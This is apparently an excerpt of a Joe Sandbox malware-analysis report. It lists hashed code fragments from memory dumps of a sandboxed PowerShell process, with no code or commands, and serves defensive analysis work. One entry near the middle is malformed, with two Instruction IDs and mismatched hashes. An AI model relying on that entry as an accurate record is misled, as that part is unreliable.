                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 888136b337ff1f3c4623558f70b2fccc6fa15c75d16c0d362c6851e53f615e83
                                                                                            • Instruction ID: 39d3b5380944783cc0d81fc157e67763c2550fdd7d4205564dafd571379ce434
                                                                                            • Opcode Fuzzy Hash: 888136b337ff1f3c4623558f70b2fccc6fa15c75d16c0d362c6851e53f615e83
                                                                                            • Instruction Fuzzy Hash: F7412674A016069FCB06DF98C594AAEF7B1FF48310B2585A9D845AB365C732EC50CFA4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 80acb8440bfc78496449b952c119cda3e57ba4e6fc036f9c6b545742b1fa8630
                                                                                            • Instruction ID: 7d33b524c6e27a3359905025ec334d14e4180a00b06c1be8dda27b0ae88c53b4
                                                                                            • Opcode Fuzzy Hash: 80acb8440bfc78496449b952c119cda3e57ba4e6fc036f9c6b545742b1fa8630
                                                                                            • Instruction Fuzzy Hash: 1D315E74B082458FDB15DFA4C894AADBBF6EF8A311F248499D446AB361CB35DC01CB64
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5a25fada25c5fe5680b821a5f551e43318bd84e94735dd6b50d95c677ced9a3c
                                                                                            • Instruction ID: 4c8edca3ff78dc676bf1c5d1169b72bec8a1fba5b19236c904bd928b6c786ef4
                                                                                            • Opcode Fuzzy Hash: 5a25fada25c5fe5680b821a5f551e43318bd84e94735dd6b50d95c677ced9a3c
                                                                                            • Instruction Fuzzy Hash: 48317E70B402048FCB14DF69D4586AEBBF6EF88720F148529E806E7350DB349C45CBA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22318e4cd725986a5c5c8a48bd24a2fa1a949537ceefc44f1a02809df828d26e
                                                                                            • Instruction ID: c20b42e329afe144ab5a46a2083792daffc84d3a7e20bda7ee803b1ba9deb249
                                                                                            • Opcode Fuzzy Hash: 22318e4cd725986a5c5c8a48bd24a2fa1a949537ceefc44f1a02809df828d26e
                                                                                            • Instruction Fuzzy Hash: 8C317A753006009BD705EB78E854B9EB7A6EFC8311F048629E60ACB361DFB5ED05CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5a2aeb9a070c23d2a46e16f919925c0c546aaaba7845b94ea5ac9e07eda0b148
                                                                                            • Instruction ID: cf65fa7d66ac25f6de8fb8ed49a7d1b72a0bdf6d8f9f15ca52655fe5c3c3b95f
                                                                                            • Opcode Fuzzy Hash: 5a2aeb9a070c23d2a46e16f919925c0c546aaaba7845b94ea5ac9e07eda0b148
                                                                                            • Instruction Fuzzy Hash: 33318E74A093969FDB02DF68C89499EFBB1FF4A310B198196D445EB362C330ED45CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf74c288e7e0e4a03fa3e6031bc469dbe86d066a17a4f0f6a2c15a4d6f62c398
                                                                                            • Instruction ID: 84cc223ea6a1e5c6c65bedb75205d46ccb25b3e724d4f3b796023220dfb163d3
                                                                                            • Opcode Fuzzy Hash: cf74c288e7e0e4a03fa3e6031bc469dbe86d066a17a4f0f6a2c15a4d6f62c398
                                                                                            • Instruction Fuzzy Hash: EB319AB1A016099FDB04EF69D4957AEBBFAEFC9314F188029E502EB350EB358C018B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 54a410f6fd1f542890525a922d4302a89ad78f6f39253bd4bac5228f981f538e
                                                                                            • Instruction ID: c0b9415117d190f5f54b0ce018d5d1d5213f87619f9df12c9c91c162a3c3a48f
                                                                                            • Opcode Fuzzy Hash: 54a410f6fd1f542890525a922d4302a89ad78f6f39253bd4bac5228f981f538e
                                                                                            • Instruction Fuzzy Hash: D9319574E002499FDB01DBA4D859AFEBBB2EF84300F118469D515AB391DF399E01CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1577568622.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7020000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1478777e4650a879db7498721786b2ac7b3ab5d2c86c988732e0f5524f9147b
                                                                                            • Instruction ID: 8865c24379f50584cda55149bcd3862ea9fc32c1348d36278541c6d988207350
                                                                                            • Opcode Fuzzy Hash: c1478777e4650a879db7498721786b2ac7b3ab5d2c86c988732e0f5524f9147b
                                                                                            • Instruction Fuzzy Hash: EA31D4B3A08326DFDB50CF18C541A69F7F1AF05321F09C2A6E9149B151DB3CDA46DB52
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 25f0e28cd3410fdde5269cd5f1f2b7cadf229c954b70fcb077692d696d4b7157
                                                                                            • Instruction ID: b871343687f0106aab35201af61dcd1b7802b47a43ccde014c0f24a7f7fb8257
                                                                                            • Opcode Fuzzy Hash: 25f0e28cd3410fdde5269cd5f1f2b7cadf229c954b70fcb077692d696d4b7157
                                                                                            • Instruction Fuzzy Hash: 7B313C70A016099FDB04EF69D4957AEBBF6AFC9314F188029E505EB350EB359C418B51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b165f5383d9b1bacbfca5ca015f156266454d8e5b0280ab8037cee36859a2ad5
                                                                                            • Instruction ID: f025d6d323a0668d8c7d8b2e244a835db2cc1b4ae12ff063b4c7f3dff2e7f282
                                                                                            • Opcode Fuzzy Hash: b165f5383d9b1bacbfca5ca015f156266454d8e5b0280ab8037cee36859a2ad5
                                                                                            • Instruction Fuzzy Hash: 0521C471A043188FDB14EFAAD41479EBBF9EB89320F18846ED419E7340CB759845CBE5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f66e2ffd4ae588b676e31c8ae5b6453b626ce1707bc09b9b9ef2aff34d45c2c4
                                                                                            • Instruction ID: 6856e9299aa6732b5b5fb956656c49e3152b348fa9e8b3d758e3b2ddd674682f
                                                                                            • Opcode Fuzzy Hash: f66e2ffd4ae588b676e31c8ae5b6453b626ce1707bc09b9b9ef2aff34d45c2c4
                                                                                            • Instruction Fuzzy Hash: D431ACB1A057448FDB64DF6AD0883EAFFF6EF89320F28801ED94DA7305C67468418B60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 96e8243e6788143d4c043bdbf9e162f3e3b71c6aac1ae54e8b0b31ea10fb0f7a
                                                                                            • Instruction ID: 0577ac92f8bd826315881c5103d76b39bf7bda50165e49439a804b5d66299262
                                                                                            • Opcode Fuzzy Hash: 96e8243e6788143d4c043bdbf9e162f3e3b71c6aac1ae54e8b0b31ea10fb0f7a
                                                                                            • Instruction Fuzzy Hash: 64312474E002099FDB04EBA4D859ABEBBB7EF84700F118469D515AB395DF399E01CFA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b731b1642be20c9ee571c59d2421cd2d1e6a2ef602e8d8230cd020f2093d4add
                                                                                            • Instruction ID: b53b86adce9a28660c9b3a1139420fc8f5ef3c0c00b4abedb14a809ef5848c87
                                                                                            • Opcode Fuzzy Hash: b731b1642be20c9ee571c59d2421cd2d1e6a2ef602e8d8230cd020f2093d4add
                                                                                            • Instruction Fuzzy Hash: 8231FB70A002188FCB14DF69D498A9EBBF6FF89710F148529E406EB360DF749C45CBA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1532080712.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_76d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9b69eb3b15cf66071a57a45c039ebd88a5c8ae869aafb22abd845b5a286bd518
                                                                                            • Instruction ID: e39715007e4e53db3f4692c1e1cb7772cbce7c60d7a74c82544b43ca5ec8c076
                                                                                            • Opcode Fuzzy Hash: 9b69eb3b15cf66071a57a45c039ebd88a5c8ae869aafb22abd845b5a286bd518
                                                                                            • Instruction Fuzzy Hash: 6021F171504300EFDF05DF10E9C0B26BB65FB88314F24C5ADED0A4A266C73AD866CBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 64006cb3876774f4923ba225ad7e389c02df431fc1eaa1278683b9cccfd900f7
                                                                                            • Instruction ID: 242eb0a0a7ef3a92e2eed123868f60edd83474938b3c49a335b7b9fd8f7aa6b0
                                                                                            • Opcode Fuzzy Hash: 64006cb3876774f4923ba225ad7e389c02df431fc1eaa1278683b9cccfd900f7
                                                                                            • Instruction Fuzzy Hash: DF217A74A04219DFCB04DF89C884AAAFBB1FF49310B15819AD809EB351C731ED41CBA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1532080712.000000000076D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0076D000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_76d000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7896930f3970c02f0c25683b04c033b43093832d6b4bd46ca0e11ca3ebd5fe49
                                                                                            • Instruction ID: 12d296ee4fd9b481ebf23fcccd94ccc11696cf02e68aefaaaf38f5c2b9397aa4
                                                                                            • Instruction ID: 4220745ee21ee2c36ddb17c20d206f9dff8afbd1362cec0e459e3583342a42d9
                                                                                            • Opcode Fuzzy Hash: 1b7d4901a117fc2a09f095bcda5a8389e78193674f72562110b45a0b84874c31
                                                                                            • Instruction Fuzzy Hash: 6AE0C2233882E51B8B07612F6C210BA7F9A8AC352171D80BBFA88C7346CD11CC1743E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3a727989277db6d9904f2a06eb2a47263bb87a5ca9beaf467d61fd45f6a98529
                                                                                            • Instruction ID: 3a4b0a9c72ad5832034d16544051eb848d0d4c35f7ee1319439cfae803623ca0
                                                                                            • Opcode Fuzzy Hash: 3a727989277db6d9904f2a06eb2a47263bb87a5ca9beaf467d61fd45f6a98529
                                                                                            • Instruction Fuzzy Hash: 70E0DF38A052088FC744AB68E8570FEBFB0EB04321F110559EE4682750DA301892CBC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4ded6728b9ca287f646da92b1220af45e3349b478609dca4213bf7c688204af6
                                                                                            • Instruction ID: e8b6eac0b90e48d37d53f17d63ad9eacc3205d2a836dc67c17f66b1312d91693
                                                                                            • Opcode Fuzzy Hash: 4ded6728b9ca287f646da92b1220af45e3349b478609dca4213bf7c688204af6
                                                                                            • Instruction Fuzzy Hash: CDF0ED709017049FE7649BB9D4DD7AABBE9FB45310F004429EA5ED7340DF396D408BA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d4fdabbce930e822547e5e1a1063507b5ae82cf55a1b50dd8ea1d5b12f44161f
                                                                                            • Instruction ID: 404563ebd2524a3ad486fdd7c460660751a52f91632bae8c8b5a2e638906150b
                                                                                            • Opcode Fuzzy Hash: d4fdabbce930e822547e5e1a1063507b5ae82cf55a1b50dd8ea1d5b12f44161f
                                                                                            • Instruction Fuzzy Hash: EEE0483140504A8FC709AB94E81F0FD7F749B01325F400257EE53521D19E341B86CFC0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1b17595e271f7425e68d51077df6ba98ddcfa45f4707f6cf122c11d8d5d7dd38
                                                                                            • Instruction ID: b8cfa0cef0bd68e209ab7c2dafcb8e4cf07ed980e6b65ee7bd2d9c9d706b0709
                                                                                            • Opcode Fuzzy Hash: 1b17595e271f7425e68d51077df6ba98ddcfa45f4707f6cf122c11d8d5d7dd38
                                                                                            • Instruction Fuzzy Hash: FEE04F3530569497CB0D2B75A41D3BEBB96ABC5725F040029EA0687382CF7D5E0587D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                            • Instruction ID: 610eecf2edb4f65e219fb37113dc6d84b20f7bd89e499610a9944a39ce54a3d6
                                                                                            • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                            • Instruction Fuzzy Hash: D3E08631B0001497CB089599D4108DDF7A5DFCC320F14847AD91AA7340DA3259168791
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4c852c03c35c3bff825d5d081757171ff29f2c2024c66a64706bf68f1a0ae00f
                                                                                            • Instruction ID: 90b12635537a5ff175aa32edab2fb4286f36129edee9522dbfe233ffd85e1d6b
                                                                                            • Opcode Fuzzy Hash: 4c852c03c35c3bff825d5d081757171ff29f2c2024c66a64706bf68f1a0ae00f
                                                                                            • Instruction Fuzzy Hash: EFD09E9271012517065975AE6811B7B97CF8FD56A574D0136BB0AD7746FD41CC0143E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07f4ffd237b03dab2df5e1905b0392468b593cbdbc3b5083c41a5c8271b72455
                                                                                            • Instruction ID: 009125dbc42ba67e871c804993c1af2618a543948a6f72d94a11287a52509d53
                                                                                            • Opcode Fuzzy Hash: 07f4ffd237b03dab2df5e1905b0392468b593cbdbc3b5083c41a5c8271b72455
                                                                                            • Instruction Fuzzy Hash: E0E01A71D0021AAF8790EFA9890119AFBF4EF88300B2085AACD19E7201E7316A12DBD1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                            • Instruction ID: 4d30fb40311a080c6adfea634be82023003ca2e0bc55596b903c5bcefbe79cbf
                                                                                            • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                            • Instruction Fuzzy Hash: AED067B0D0420D9F8780EFADC94156EFBF4EB48300F6085BA8919E7312E7369A12CBD1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5d204af55818f9019a4c18d3f4ffd7cd62544bcda41ae01e5b9aa0c5e63df0c7
                                                                                            • Instruction ID: c4a6d4233ec35c088f1494fc2f7ee838999e3224cb350ff3fda635a922a73bee
                                                                                            • Opcode Fuzzy Hash: 5d204af55818f9019a4c18d3f4ffd7cd62544bcda41ae01e5b9aa0c5e63df0c7
                                                                                            • Instruction Fuzzy Hash: 67D0623180514A8BCB4CAF94D45F5BDBB74AB10705F40455ADE1752690DF341A56CF81
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5dca5cdea2a5cea9f8a43c180cabc0879c423dc5c45aeb16c2e6a519d8e258b0
                                                                                            • Instruction ID: 2e3faa602de931e94c7399de5f5cb8eb024c08b34d8a5c1949eefc10bf48262c
                                                                                            • Opcode Fuzzy Hash: 5dca5cdea2a5cea9f8a43c180cabc0879c423dc5c45aeb16c2e6a519d8e258b0
                                                                                            • Instruction Fuzzy Hash: E3D01734E052098FC748EFA8E85A56EBFB5AB48301F000569DE0A93390DA355D42CBC1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ce079e4311c2ef6268d085fe7ca9cb8d00e1eef399def6cf2cdb3853958e49a4
                                                                                            • Instruction ID: 66eb7f58d22c7c947e216fb69782f3b583dfd820ca9670005e6e7c4617c301cd
                                                                                            • Opcode Fuzzy Hash: ce079e4311c2ef6268d085fe7ca9cb8d00e1eef399def6cf2cdb3853958e49a4
                                                                                            • Instruction Fuzzy Hash: C4D012744863449BCB466F79D99869C3F90FF11B05F0008AED4068BA92CA76C4438F10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c5db0a34bb686ae15541e32d81b0d28a0c12336fc359281b83e92cb5a3d0c39b
                                                                                            • Instruction ID: ef4652fdb562f8a70164829dca537613abaa5705a8e7d6a72f04a990177abd1c
                                                                                            • Opcode Fuzzy Hash: c5db0a34bb686ae15541e32d81b0d28a0c12336fc359281b83e92cb5a3d0c39b
                                                                                            • Instruction Fuzzy Hash: E9C08CB19683504BEF488FB4880A6623FF5BB42384700C06A9001C1180CA380081DAA1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d15b9b8e1e0d10d263c1f00e65aca9314776a13a196a47d8ea5d6cbf320ffe1a
                                                                                            • Instruction ID: ec604eb58b7fd59e48ba665601efe614b2256bb339555566d05cfd1c7feb1c8e
                                                                                            • Opcode Fuzzy Hash: d15b9b8e1e0d10d263c1f00e65aca9314776a13a196a47d8ea5d6cbf320ffe1a
                                                                                            • Instruction Fuzzy Hash: 8DB09B300457088FC2446F75A8045197759BE4560574004A9D4190AB924F35D441C954
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: wr^$wr^$wr^$wr^$wr^
                                                                                            • API String ID: 0-2001051719
                                                                                            • Opcode ID: 35f6a2fd56c9f609b891709a3035385105a9c3d08b615b62aac780d664d95db1
                                                                                            • Instruction ID: 1fa6399ca57deee6c4c1b1552601972eb9ac0c0fc14b83762ef9f80a00930fab
                                                                                            • Opcode Fuzzy Hash: 35f6a2fd56c9f609b891709a3035385105a9c3d08b615b62aac780d664d95db1
                                                                                            • Instruction Fuzzy Hash: C591E21650F7DA1FDB17A73888A41857F71AE03268B1E84C7C4D5CF2A3D619990EC3A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.1534440511.0000000000980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_980000_powershell.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: wr^$wr^$wr^$wr^$wr^
                                                                                            • API String ID: 0-2001051719
                                                                                            • Opcode ID: 966b06fc4f2ac99a6b47895c97373e93e8ae24fbda14cd3a4a97112c8125bfb8
                                                                                            • Instruction ID: 8be879764ddc4aae9384920f5981fd283d0e12c5f658d45757370cbf93ed8651
                                                                                            • Opcode Fuzzy Hash: 966b06fc4f2ac99a6b47895c97373e93e8ae24fbda14cd3a4a97112c8125bfb8
                                                                                            • Instruction Fuzzy Hash: 7251045650F3C61FDB176B3988A94903F71AE6726431E00DBD1C6CF2A3DA19180BC763